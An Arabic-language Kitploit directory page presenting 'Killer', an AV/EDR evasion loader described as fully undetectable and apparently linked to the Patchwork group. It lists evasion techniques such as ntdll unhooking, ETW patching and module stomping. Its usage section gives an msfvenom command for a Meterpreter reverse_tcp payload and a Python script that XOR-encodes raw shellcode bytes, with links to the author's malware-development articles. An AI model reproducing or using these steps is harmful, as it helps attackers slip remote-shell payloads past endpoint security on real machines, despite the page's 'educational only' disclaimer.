Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Killer — Killer هي أداة بسيطة جداً مصممة لتجاوز أدوات الأمان AV/EDR باستخدام تقنيات مراوغة متنوعة، وتستخدم من قبل مجموعة Patchwork. | Kitploit
أدوات/GitHubGitHub/0xhossam/killer
الاستغلالالتهرب من IDS/IPSشيل كودالتعلم والتعليمالفريق الأحمرتطوير الحمولاتمكافحة الروبوتات
GitHub0xhossam/killer

Killer

Killer هي أداة بسيطة جداً مصممة لتجاوز أدوات الأمان AV/EDR باستخدام تقنيات مراوغة متنوعة، وتستخدم من قبل مجموعة Patchwork.

عرض المستودع
846135منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة القاتل (تجاوز EDR)

إنها أداة تجاوز لمكافحة الفيروسات/EDR تم إنشاؤها لتجاوز أدوات الأمان لأغراض التعلم، حتى الآن الأداة FUD.

الميزات:

  • Module Stomping لتجاوز فحص الذاكرة
  • إلغاء ربط DLL باستخدام نسخة جديدة من ntdll
  • إخفاء IAT والتعتيم وإلغاء ربط API
  • تصحيح ETW لتجاوز بعض ضوابط الأمان
  • تضمين تقنيات تجاوز الصندوق الرملي ومكافحة التصحيح الأساسية
  • معتم بالكامل (الدوال - المفاتيح - Shellcode) باستخدام XOR
  • Shellcode معكوس ومشفر
  • نقل الحمولة إلى ذاكرة مجوفة دون استخدام APIs
  • تنفيذ GetProcAddress و GetModuleHandle بواسطة @cocomelonc
  • يعمل دون إنشاء خيط جديد ويدعم معمارية x64 و x86

كيفية الاستخدام

قم بإنشاء shellcode الخاص بك باستخدام أداة msfvenom :

root@kitploit:~
  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST<IP> LPORT<PORT> -f py
  

ثم انسخ المخرجات إلى دالة تشفير XOR :

root@kitploit:~
    data = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

    key  = 0x50 # ضع مفتاحك هنا كبايت مثلًا (0x90 أو 0x40 أو 0x30) والمزيد...

    print('{ ', end='')
    for i in data:
        print(hex(i ^ key), end=', ')

    print("0x0 };") # لاحظ أنه يضيف بايتًا واحدًا "0x0" في النهاية.

وبعد ذلك يمكنك التعامل مع دالة فك التشفير الخاصة بك، الأمر ليس سهلاً لمستخدمي السكريبتات المبتدئين ^-^، يمكنك قراءة المزيد عنها في مقالتي :

  • الجزء 1 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5
  • الجزء 2 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354
  • الجزء 3 => https://medium.com/@0xHossam/unhooking-memory-object-hiding-3229b75618f7
  • الجزء 4 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-p-4-162662bb630e

هذه هي النتيجة عند التشغيل :

image

إثبات المفهوم (PoC) :

https://antiscan.me/images/result/07OkIKKhpRsG.png

image

ملاحظات هامة

  • أولاً شكرًا لـ Abdallah Mohammed لمساعدتي في تطويرها ^_^
  • الأداة لأغراض تعليمية فقط
  • قم بتجميع الكود باستخدام مترجم Visual Studio
تنزيل الأداة